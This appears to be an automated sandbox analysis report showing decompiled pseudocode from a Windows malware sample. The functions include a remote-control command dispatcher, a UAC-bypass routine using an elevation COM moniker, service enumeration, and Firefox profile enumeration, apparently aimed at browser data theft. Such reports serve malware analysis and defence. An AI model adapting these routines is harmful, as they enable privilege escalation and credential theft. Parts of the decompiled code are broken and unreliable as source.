                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCloseCreateLibraryLoadProcsend
                    • String ID: SHDeleteKeyW$Shlwapi.dll$DG$DG$DG$DG
                    • API String ID: 2127411465-404447877
                    • Opcode ID: d00bd4ae4fd433c46f73542aef515107a72cd24d413680c7c05c5e3fb3408269
                    • Instruction ID: 76ff5de12d8ad8988a9259c68fd657e405c0dfe1bdcc24b2c196b9ecd1a6c3f0
                    • Opcode Fuzzy Hash: d00bd4ae4fd433c46f73542aef515107a72cd24d413680c7c05c5e3fb3408269
                    • Instruction Fuzzy Hash: 78E1FB72A0430027C614BB76DD578AF76A96F95748F40053FF906B71E2EE3D8A44C29E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E004190BC(signed int __edx, void* __eflags, char _a8) {
                    				void* _v28;
                    				char _v32;
                    				void* _v36;
                    				void* _v40;
                    				char _v44;
                    				char _v48;
                    				char _v52;
                    				signed char* _t61;
                    				char* _t62;
                    				signed char* _t63;
                    				intOrPtr* _t73;
                    				intOrPtr* _t80;
                    				char* _t87;
                    				char* _t88;
                    				char* _t89;
                    				intOrPtr* _t90;
                    				signed char* _t92;
                    				char* _t93;
                    				intOrPtr _t95;
                    				signed int _t105;
                    				void* _t108;
                    				signed int _t148;
                    				signed int _t151;
                    
                    				_t151 = __edx;
                    				_t95 =  *((intOrPtr*)(E004051E3(0)));
                    				E004041A2( &_a8,  &_v32, 1, 0xffffffff);
                    				if(_t95 != 0x30) {
                    					__eflags = _t95 - 0x31;
                    					if(_t95 != 0x31) {
                    						__eflags = _t95 - 0x32;
                    						if(_t95 != 0x32) {
                    							__eflags = _t95 - 0x33;
                    							if(_t95 != 0x33) {
                    								__eflags = _t95 - 0x34;
                    								if(_t95 != 0x34) {
                    									__eflags = _t95 - 0x35;
                    									if(_t95 != 0x35) {
                    										__eflags = _t95 - 0x36;
                    										if(_t95 != 0x36) {
                    											__eflags = _t95 - 0x37;
                    											if(_t95 == 0x37) {
                    												_t61 = E004051E3(2);
                    												_t62 = E004051E3(1);
                    												_t63 = E004051E3(0);
                    												_t105 =  *_t61 & 0x000000ff;
                    												__eflags =  *_t62;
                    												_push(0);
                    												_push(_t105);
                    												_t52 =  *_t62 != 0;
                    												__eflags = _t52;
                    												_push((_t105 & 0xffffff00 | _t52) & 0x000000ff);
                    												_t108 = 0x474780;
                    												goto L18;
                    											}
                    										} else {
                    											_push(0);
                    											_push(0x78);
                    											goto L15;
                    										}
                    									} else {
                    										_push(0);
                    										_push(0xffffff88);
                    										L15:
                    										mouse_event(0x800, 0, 0, ??, ??);
                    									}
                    								} else {
                    									_v40 =  *((intOrPtr*)(E004051E3(0)));
                    									_v40 =  *((intOrPtr*)(E004051E3(4)));
                    									E00418F3F( *((intOrPtr*)(E004051E3(8))),  &_v48,  &_v44);
                    									E004193E7(_v48, _v44);
                    								}
                    							} else {
                    								_t73 = E004051E3(0);
                    								_v44 =  *((intOrPtr*)(E004051E3(4)));
                    								_v44 =  *((intOrPtr*)(E004051E3(8)));
                    								E00418F3F( *((intOrPtr*)(E004051E3(0xc))),  &_v52,  &_v48);
                    								E00419384( *_t73, _v52, _v48);
                    								goto L8;
                    							}
                    						} else {
                    							_t80 = E004051E3(0);
                    							_v40 =  *((intOrPtr*)(E004051E3(4)));
                    							_v48 =  *((intOrPtr*)(E004051E3(8)));
                    							E00418F3F( *((intOrPtr*)(E004051E3(0xc))),  &_v48,  &_v52);
                    							E00419321( *_t80, _v48, _v52);
                    							goto L8;
                    						}
                    					} else {
                    						_t87 = E004051E3(4);
                    						_t88 = E004051E3(3);
                    						_t89 = E004051E3(2);
                    						_t90 = E004051E3(0);
                    						 *_t87 =  *_t88;
                    						__eflags =  *_t89;
                    						E00419428( *_t90, __edx & 0xffffff00 |  *_t89 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t87 != 0x00000000) & 0 |  *_t88 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t87 != 0x00000000) & 0x000000ff);
                    						L8:
                    					}
                    				} else {
                    					_t92 = E004051E3(2);
                    					_t93 = E004051E3(1);
                    					_t63 = E004051E3(0);
                    					_t148 =  *_t92 & 0x000000ff;
                    					_t177 =  *_t93;
                    					_push(1);
                    					_push(_t148);
                    					_push((_t148 & 0xffffff00 |  *_t93 != 0x00000000) & 0x000000ff);
                    					_t108 = 0x4746c8;
                    					L18:
                    					_push( *_t63 & 0x000000ff);
                    					E004183D1(_t108, _t151, _t177);
                    				}
                    				E00401FD8();
                    				E00401FD8();
                    				return 0;
                    			}


























                    0x004190bc
                    0x004190da
                    0x004190e1
                    0x004190e9
                    0x0041912a
                    0x0041912d
                    0x00419189
                    0x0041918c
                    0x004191e9
                    0x004191ec
                    0x0041924d
                    0x00419250
                    0x0041929e
                    0x004192a1
                    0x004192a8
                    0x004192ab
                    0x004192bf
                    0x004192c2
                    0x004192ca
                    0x004192d7
                    0x004192e4
                    0x004192e9
                    0x004192ec
                    0x004192ef
                    0x004192f1
                    0x004192f2
                    0x004192f2
                    0x004192f8
                    0x004192f9
                    0x00000000
                    0x004192f9
                    0x004192ad
                    0x004192ad
                    0x004192ae
                    0x00000000
                    0x004192ae
                    0x004192a3
                    0x004192a3
                    0x004192a4
                    0x004192b0
                    0x004192b7
                    0x004192b7
                    0x00419252
                    0x00419264
                    0x00419275
                    0x00419289
                    0x00419297
                    0x00419297
                    0x004191ee
                    0x004191f3
                    0x00419209
                    0x0041921e
                    0x00419232
                    0x00419242
                    0x00000000
                    0x00419242
                    0x0041918e
                    0x00419193
                    0x004191a9
                    0x004191be
                    0x004191d2
                    0x004191e2
                    0x00000000
                    0x004191e2
                    0x0041912f
                    0x00419135
                    0x00419142
                    0x0041914f
                    0x0041915c
                    0x00419167
                    0x00419171
                    0x0041917e
                    0x00419247
                    0x00419247
                    0x004190eb
                    0x004190f1
                    0x004190fe
                    0x0041910b
                    0x00419110
                    0x00419113
                    0x00419116
                    0x00419118
                    0x0041911f
                    0x00419120
                    0x004192fe
                    0x00419301
                    0x00419302
                    0x00419302
                    0x0041930b
                    0x00419313
                    0x00419320

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0$1$2$3$4$5$6$7
                    • API String ID: 0-3177665633
                    • Opcode ID: 105f01f18f6350a39f8cfbb4754e953f7d29f28f58273e1750624e37d93fb159
                    • Instruction ID: d3442ae6020329ec1da1492aa6d56d452ac93fe3808bf19c43fb3c18fe58e4ad
                    • Opcode Fuzzy Hash: 105f01f18f6350a39f8cfbb4754e953f7d29f28f58273e1750624e37d93fb159
                    • Instruction Fuzzy Hash: A271B4709083019FD304EF21D862BEB7B94DF95710F10491EF9A26B2D1DF78AA49CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00452020(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, char _a12) {
                    				signed int _v8;
                    				int _v12;
                    				int _v16;
                    				char _v20;
                    				signed int* _v24;
                    				short* _v28;
                    				void* __ebp;
                    				signed int _t39;
                    				void* _t45;
                    				signed int* _t46;
                    				signed int _t47;
                    				short* _t48;
                    				int _t49;
                    				short* _t56;
                    				short* _t57;
                    				short* _t58;
                    				int _t66;
                    				int _t68;
                    				short* _t72;
                    				intOrPtr _t75;
                    				void* _t77;
                    				short* _t78;
                    				intOrPtr _t85;
                    				short* _t89;
                    				short* _t92;
                    				void* _t94;
                    				short** _t102;
                    				short* _t103;
                    				signed int _t105;
                    				signed short _t108;
                    				signed int _t109;
                    				void* _t110;
                    
                    				_t39 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t39 ^ _t109;
                    				_t3 =  &_a12; // 0x44445e
                    				_t89 =  *_t3;
                    				_t105 = _a4;
                    				_v28 = _a8;
                    				_v24 = E00447C05(_t89, __ecx, __edx) + 0x50;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_t45 = E00447C05(_t89, __ecx, __edx);
                    				_t8 =  &_v20; // 0x44445e
                    				_t99 = 0;
                    				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
                    				_t92 = _t105 + 0x80;
                    				_t46 = _v24;
                    				 *_t46 = _t105;
                    				_t102 =  &(_t46[1]);
                    				 *_t102 = _t92;
                    				if(_t92 != 0 &&  *_t92 != 0) {
                    					_t85 =  *0x45f334; // 0x17
                    					E00451FC3(0, "L\xef\xbf\xbdE", _t85 - 1,					_t46 = _v24;
                    					_t110 = _t110 + 0xc;
                    					_t99 = 0;
                    				}
                    				_v20 = _t99;
                    				_t47 =  *_t46;
                    				if(_t47 == 0 ||  *_t47 == _t99) {
                    					_t48 =  *_t102;
                    					__eflags = _t48;
                    					if(_t48 == 0) {
                    						L19:
                    						_v20 = 0x104;
                    						_t49 = GetUserDefaultLCID();
                    						_v12 = _t49;
                    						_v16 = _t49;
                    						goto L20;
                    					}
                    					__eflags =  *_t48 - _t99;
                    					if( *_t48 == _t99) {
                    						goto L19;
                    					}
                    					_t21 =  &_v20; // 0x44445e
                    					E00451960(_t92, _t99, _t21);
                    					_pop(_t92);
                    					goto L20;
                    				} else {
                    					_t72 =  *_t102;
                    					if(_t72 == 0 ||  *_t72 == _t99) {
                    						_t16 =  &_v20; // 0x44445e
                    						E00451A46(_t92, _t99, _t16);
                    					} else {
                    						_t15 =  &_v20; // 0x44445e
                    						E004519AB(_t92, _t99, _t15);
                    					}
                    					_pop(_t92);
                    					if(_v20 != 0) {
                    						_t103 = 0;
                    						__eflags = 0;
                    						goto L25;
                    					} else {
                    						_t75 =  *0x45f21c; // 0x41
                    						_t77 = E00451FC3(_t99, 0x45ef10, _t75 - 1, _v24);
                    						_t110 = _t110 + 0xc;
                    						if(_t77 == 0) {
                    							L20:
                    							_t103 = 0;
                    							__eflags = 0;
                    							L21:
                    							if(_v20 != 0) {
                    								L25:
                    								asm("sbb esi, esi");
                    								_t108 = E00451E4C(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
                    								_pop(_t94);
                    								__eflags = _t108;
                    								if(_t108 == 0) {
                    									goto L22;
                    								}
                    								__eflags = _t108 - 0xfde8;
                    								if(_t108 == 0xfde8) {
                    									goto L22;
                    								}
                    								__eflags = _t108 - 0xfde9;
                    								if(_t108 == 0xfde9) {
                    									goto L22;
                    								}
                    								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
                    								__eflags = _t56;
                    								if(_t56 == 0) {
                    									goto L22;
                    								}
                    								_t57 = IsValidLocale(_v16, 1);
                    								__eflags = _t57;
                    								if(_t57 == 0) {
                    									goto L22;
                    								}
                    								_t58 = _v28;
                    								__eflags = _t58;
                    								if(__eflags != 0) {
                    									 *_t58 = _t108;
                    								}
                    								E00448558(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
                    								__eflags = _t89;
                    								if(__eflags == 0) {
                    									L36:
                    									L23:
                    									return E004349BB(_v8 ^ _t109);
                    								}
                    								E00448558(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
                    								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
                    								__eflags = _t66;
                    								if(_t66 == 0) {
                    									goto L22;
                    								}
                    								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
                    								__eflags = _t68;
                    								if(_t68 == 0) {
                    									goto L22;
                    								}
                    								E004418CF( &(_t89[0x80]), _t108,  &(_t89[0x80]), 0x10, 0xa);
                    								goto L36;
                    							}
                    							L22:
                    							goto L23;
                    						}
                    						_t78 =  *_t102;
                    						_t103 = 0;
                    						if(_t78 == 0 ||  *_t78 == 0) {
                    							E00451A46(_t92, _t99,  &_v20);
                    						} else {
                    							E004519AB(_t92, _t99,  &_v20);
                    						}
                    						_pop(_t92);
                    						goto L21;
                    					}
                    				}
                    			}



































                    0x00452028
                    0x0045202f
                    0x00452036
                    0x00452036
                    0x0045203a
                    0x0045203e
                    0x0045204c
                    0x00452051
                    0x00452052
                    0x00452053
                    0x00452054
                    0x00452059
                    0x0045205c
                    0x0045205e
                    0x00452064
                    0x0045206a
                    0x0045206d
                    0x0045206f
                    0x00452072
                    0x00452076
                    0x0045207d
                    0x0045208a
                    0x0045208f
                    0x00452092
                    0x00452095
                    0x00452095
                    0x00452097
                    0x0045209a
                    0x0045209e
                    0x0045210e
                    0x00452110
                    0x00452112
                    0x00452125
                    0x00452125
                    0x0045212c
                    0x00452132
                    0x00452135
                    0x00000000
                    0x00452135
                    0x00452114
                    0x00452117
                    0x00000000
                    0x00000000
                    0x00452119
                    0x0045211d
                    0x00452122
                    0x00000000
                    0x004520a5
                    0x004520a5
                    0x004520a9
                    0x004520bb
                    0x004520bf
                    0x004520b0
                    0x004520b0
                    0x004520b4
                    0x004520b4
                    0x004520c8
                    0x004520c9
                    0x00452153
                    0x00452153
                    0x00000000
                    0x004520cf
                    0x004520cf
                    0x004520de
                    0x004520e3
                    0x004520e8
                    0x00452138
                    0x00452138
                    0x00452138
                    0x0045213a
                    0x0045213e
                    0x00452155
                    0x00452161
                    0x0045216b
                    0x0045216e
                    0x0045216f
                    0x00452171
                    0x00000000
                    0x00000000
                    0x00452173
                    0x00452179
                    0x00000000
                    0x00000000
                    0x0045217b
                    0x00452181
                    0x00000000
                    0x00000000
                    0x00452187
                    0x0045218d
                    0x0045218f
                    0x00000000
                    0x00000000
                    0x00452196
                    0x0045219c
                    0x0045219e
                    0x00000000
                    0x00000000
                    0x004521a0
                    0x004521a3
                    0x004521a5
                    0x004521a7
                    0x004521a7
                    0x004521b8
                    0x004521bd
                    0x004521bf
                    0x0045221f
                    0x00452142
                    0x00452152
                    0x00452152
                    0x004521ce
                    0x004521de
                    0x004521e4
                    0x004521e6
                    0x00000000
                    0x00000000
                    0x004521fd
                    0x00452203
                    0x00452205
                    0x00000000
                    0x00000000
                    0x00452217
                    0x00000000
                    0x0045221c
                    0x00452140
                    0x00000000
                    0x00452140
                    0x004520ea
                    0x004520ec
                    0x004520f0
                    0x00452106
                    0x004520f7
                    0x004520fb
                    0x004520fb
                    0x0045210b
                    0x00000000
                    0x0045210b
                    0x004520c9

                    APIs
                      • Part of subcall function 00447C05: GetLastError.KERNEL32(?,00000000,00441655,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C09
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C3C
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C7D
                      • Part of subcall function 00447C05: _abort.LIBCMT ref: 00447C83
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C64
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C71
                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045212C
                    • IsValidCodePage.KERNEL32(00000000), ref: 00452187
                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452196
                    • GetLocaleInfoW.KERNEL32(?,00001001,^DD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004521DE
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004521FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                    • String ID: LE$^DD$^DD$^DD
                    • API String ID: 745075371-3185053577
                    • Opcode ID: a471993b9cf9cbb1ffb238fcf3aff90d67cb4ba9a00d6161f7b3abd933df96eb
                    • Instruction ID: 4f147df1b5308acbeaa9c6ae96ed0df08e46904105858d284b5bb78eee7160f4
                    • Opcode Fuzzy Hash: a471993b9cf9cbb1ffb238fcf3aff90d67cb4ba9a00d6161f7b3abd933df96eb
                    • Instruction Fuzzy Hash: 4F51A371900605ABDB10DFA6CD41ABF77B8AF05702F04046BFE15E7292DBB89948C7A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 15%
                    			E00407424(void* __edx, void* __eflags, signed int* _a8) {
                    				signed int _v8;
                    				intOrPtr _v24;
                    				char _v44;
                    				char _v564;
                    				void* _t14;
                    				char* _t25;
                    				char* _t34;
                    
                    				_push("[+] ucmAllocateElevatedObject\n");
                    				E00407127(__eflags);
                    				_v8 = _v8 & 0x00000000;
                    				_t33 = L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}";
                    				_t34 = 0x80004005;
                    				_t14 = E0043B4CB(L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}");
                    				_t38 = _t14 - 0x40;
                    				if(_t14 <= 0x40) {
                    					E004070B7();
                    					_v44 = 0x24;
                    					_v24 = 4;
                    					E0043F1E4( &_v564, L"Elevation:Administrator!new:");
                    					E0043F206( &_v564, _t33);
                    					E00407127(_t38);
                    					_t25 =  &_v564;
                    					__imp__CoGetObject(_t25,  &_v44, 0x465500,  &_v8, "[+] CoGetObject\n");
                    					_t34 = _t25;
                    					_t39 = _t34;
                    					if(_t34 == 0) {
                    						_push("[+] CoGetObject SUCCESS\n");
                    					} else {
                    						_push("[-] CoGetObject FAILURE\n");
                    					}
                    					E00407127(_t39);
                    				}
                    				 *_a8 = _v8;
                    				return _t34;
                    			}










                    0x0040742f
                    0x00407434
                    0x00407439
                    0x0040743d
                    0x00407443
                    0x00407448
                    0x0040744f
                    0x00407452
                    0x00407457
                    0x00407462
                    0x0040746f
                    0x00407476
                    0x00407483
                    0x0040748d
                    0x004074a2
                    0x004074a9
                    0x004074af
                    0x004074b1
                    0x004074b3
                    0x004074bc
                    0x004074b5
                    0x004074b5
                    0x004074b5
                    0x004074c1
                    0x004074c6
                    0x004074ce
                    0x004074d6

                    APIs
                    • _wcslen.LIBCMT ref: 00407448
                    • CoGetObject.OLE32(?,00000024,00465500,00000000), ref: 004074A9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Object_wcslen
                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • API String ID: 240030777-3166923314
                    • Opcode ID: 3a97580f57584eded6e348c6928e70feac8dda42f8467409e5fa1b8b7823a6cc
                    • Instruction ID: a9033d3181c91265b12bca5136390c5f9ef44ef37963b9823112e2d65463f647
                    • Opcode Fuzzy Hash: 3a97580f57584eded6e348c6928e70feac8dda42f8467409e5fa1b8b7823a6cc
                    • Instruction Fuzzy Hash: AB117775D04218A6C710EA95D845E9EBBB8DB48B54F14016FF904B22C1EB7C9A44867F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E0041A1DD(void* __ecx, void* __edx) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t100;
                    				void* _t107;
                    				int _t108;
                    				long _t110;
                    				void* _t133;
                    				void* _t194;
                    				short** _t195;
                    				int _t196;
                    				struct _ENUM_SERVICE_STATUS* _t197;
                    				int _t198;
                    				struct _QUERY_SERVICE_CONFIG* _t201;
                    				void* _t202;
                    
                    				_t185 = __edx;
                    				_t200 = 0;
                    				_t194 = __ecx;
                    				 *((intOrPtr*)(_t202 + 0x3c)) = __ecx;
                    				_t133 = OpenSCManagerA(0, 0, 4);
                    				if(_t133 != 0) {
                    					_t135 = _t202 + 0x4c;
                    					E00401F86(_t133, _t202 + 0x4c);
                    					 *(_t202 + 0x18) = 0;
                    					 *(_t202 + 0x18) = 0;
                    					 *(_t202 + 0x28) = 0;
                    					__eflags = EnumServicesStatusW(_t133, 0x3b, 3, _t202 + 0xa4, 0, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
                    					if(__eflags != 0) {
                    						L12:
                    						CloseServiceHandle(_t133);
                    						E00403262(_t133, _t194, _t200, __eflags, _t202 + 0x4c);
                    						E00401F09();
                    						L13:
                    						return _t194;
                    					}
                    					__eflags = GetLastError() - 0xea;
                    					if(__eflags != 0) {
                    						goto L12;
                    					}
                    					_t196 =  *(_t202 + 0x18);
                    					_push(_t196);
                    					_t200 = E0043B715(_t135);
                    					 *(_t202 + 0x30) = _t200;
                    					EnumServicesStatusW(_t133, 0x3b, 3, _t200, _t196, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
                    					_t197 = 0;
                    					 *(_t202 + 0x28) = 0;
                    					__eflags =  *(_t202 + 0x14);
                    					if(__eflags <= 0) {
                    						L11:
                    						L0043B710(_t200);
                    						goto L12;
                    					}
                    					_t195 = _t200;
                    					_t201 =  *(_t202 + 0x2c);
                    					do {
                    						E0040325D(E004042FC(_t133, _t202 + 0x64, _t195[1], _t201, __eflags, E0040417E(_t133, _t202 + 0x38, _t185, _t201, "\t")));
                    						E00401F09();
                    						E00401F09();
                    						E0040325D(E004042FC(_t133, _t202 + 0x34,  *_t195, _t201, __eflags, E0040417E(_t133, _t202 + 0x68, _t195[1], _t201, "\t")));
                    						E00401F09();
                    						E00401F09();
                    						_t100 = E0040417E(_t133, _t202 + 0x80,  *_t195, _t201, "\t");
                    						_t185 = E0041B69C(_t133, _t202 + 0x64, _t195[3]);
                    						E0040325D(E00402FA5(_t202 + 0x38, _t101, _t100));
                    						E00401F09();
                    						E00401F09();
                    						E00401F09();
                    						 *(_t202 + 0x1c) =  *(_t202 + 0x1c) & 0x00000000;
                    						_t107 = OpenServiceW(_t133,  *_t195, 1);
                    						_t160 = _t202 + 0x1c;
                    						 *(_t202 + 0x24) = _t107;
                    						_t108 = QueryServiceConfigW(_t107, _t201, 0, _t202 + 0x1c);
                    						__eflags = _t108;
                    						if(_t108 == 0) {
                    							_t110 = GetLastError();
                    							__eflags = _t110 - 0x7a;
                    							if(_t110 == 0x7a) {
                    								_t198 =  *(_t202 + 0x1c);
                    								_push(_t198);
                    								_t201 = E0043B715(_t160);
                    								QueryServiceConfigW( *(_t202 + 0x30), _t201, _t198, _t202 + 0x1c);
                    								_t199 = "\t";
                    								E0040325D(E00403014(_t133, _t202 + 0x80, E0041B69C(_t133, _t202 + 0x34,  *_t201), _t195, _t201, __eflags, "\t"));
                    								E00401F09();
                    								E00401F09();
                    								E0040325D(E00403014(_t133, _t202 + 0x80, E0041B69C(_t133, _t202 + 0x34,  *((intOrPtr*)(_t201 + 4))), _t195, _t201, __eflags, "\t"));
                    								E00401F09();
                    								E00401F09();
                    								_t185 = E004042FC(_t133, _t202 + 0x38,  *((intOrPtr*)(_t201 + 0xc)), _t201, __eflags, E0040417E(_t133, _t202 + 0x6c, _t119, _t201, _t199));
                    								E0040325D(E00403014(_t133, _t202 + 0x80, _t125, _t195, _t201, __eflags, "\n"));
                    								E00401F09();
                    								E00401F09();
                    								E00401F09();
                    								L0043B710(_t201);
                    								_t197 =  *(_t202 + 0x2c);
                    							}
                    						}
                    						CloseServiceHandle( *(_t202 + 0x24));
                    						_t197 = _t197 + 1;
                    						_t195 =  &(_t195[9]);
                    						 *(_t202 + 0x28) = _t197;
                    						__eflags = _t197 -  *(_t202 + 0x14);
                    					} while (__eflags < 0);
                    					_t194 =  *(_t202 + 0x30);
                    					_t200 =  *(_t202 + 0x2c);
                    					goto L11;
                    				}
                    				E0040417E(_t133, _t194, _t185, 0, 0x46b928);
                    				goto L13;
                    			}


















                    0x0041a1dd
                    0x0041a1e9
                    0x0041a1eb
                    0x0041a1ef
                    0x0041a1f9
                    0x0041a1fd
                    0x0041a210
                    0x0041a214
                    0x0041a21d
                    0x0041a226
                    0x0041a22f
                    0x0041a248
                    0x0041a24a
                    0x0041a4b6
                    0x0041a4b7
                    0x0041a4c4
                    0x0041a4cd
                    0x0041a4d2
                    0x0041a4de
                    0x0041a4de
                    0x0041a256
                    0x0041a25b
                    0x00000000
                    0x00000000
                    0x0041a261
                    0x0041a265
                    0x0041a26c
                    0x0041a277
                    0x0041a288
                    0x0041a28e
                    0x0041a290
                    0x0041a294
                    0x0041a298
                    0x0041a4af
                    0x0041a4b0
                    0x00000000
                    0x0041a4b5
                    0x0041a29e
                    0x0041a2a0
                    0x0041a2a4
                    0x0041a2c5
                    0x0041a2ce
                    0x0041a2d7
                    0x0041a2fc
                    0x0041a305
                    0x0041a30e
                    0x0041a31f
                    0x0041a331
                    0x0041a342
                    0x0041a34b
                    0x0041a354
                    0x0041a35d
                    0x0041a362
                    0x0041a36c
                    0x0041a372
                    0x0041a376
                    0x0041a37f
                    0x0041a385
                    0x0041a387
                    0x0041a38d
                    0x0041a393
                    0x0041a396
                    0x0041a39c
                    0x0041a3a0
                    0x0041a3a7
                    0x0041a3b4
                    0x0041a3c1
                    0x0041a3e0
                    0x0041a3e9
                    0x0041a3f2
                    0x0041a418
                    0x0041a421
                    0x0041a42a
                    0x0041a44c
                    0x0041a460
                    0x0041a469
                    0x0041a472
                    0x0041a47b
                    0x0041a481
                    0x0041a486
                    0x0041a48a
                    0x0041a396
                    0x0041a48f
                    0x0041a495
                    0x0041a496
                    0x0041a499
                    0x0041a49d
                    0x0041a49d
                    0x0041a4a7
                    0x0041a4ab
                    0x00000000
                    0x0041a4ab
                    0x0041a206
                    0x00000000

                    APIs
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748D0), ref: 0041A1F3
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A242
                    • GetLastError.KERNEL32 ref: 0041A250
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A288
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                    • String ID:
                    • API String ID: 3587775597-0
                    • Opcode ID: ea4a4062d524f78841aba94f46d6628da9fd82aa3eaece60bccd5271ee3d56a2
                    • Instruction ID: df45cbaf70ff35f808fdbfa030388fe77cd33a8ff202fb12f2a5a2957e26fc52
                    • Opcode Fuzzy Hash: ea4a4062d524f78841aba94f46d6628da9fd82aa3eaece60bccd5271ee3d56a2
                    • Instruction Fuzzy Hash: 298173711043059BC304EF61DC45DAFB7A8FF94319F10082EF146A21A2EF78EA49CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040C1C2(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				struct _WIN32_FIND_DATAW _v740;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t37;
                    				signed int _t39;
                    				signed int _t41;
                    				void* _t42;
                    				void* _t93;
                    				void* _t94;
                    				void* _t95;
                    				void* _t96;
                    
                    				_t61 = __ebx;
                    				_t95 = __ecx;
                    				E0040417E(__ebx,  &_v28, __edx, _t96, E0043BA8F(__ebx, __ecx, __eflags, L"AppData"));
                    				L00408F79(__ebx,  &_v28, _t93, _t96, L"\\Mozilla\\Firefox\\Profiles\\");
                    				_t91 =  &_v28;
                    				_t94 = FindFirstFileW(E00401F04(E00409082( &_v100,  &_v28, _t96, "*")),  &_v740);
                    				E00401F09();
                    				if(_t94 != 0xffffffff) {
                    					E004020DF(_t61,  &_v76);
                    					while(1) {
                    						_t37 = FindNextFileW(_t94,  &_v740);
                    						__eflags = _t37;
                    						if(_t37 == 0) {
                    							break;
                    						}
                    						__eflags = _v740.dwFileAttributes & 0x00000010;
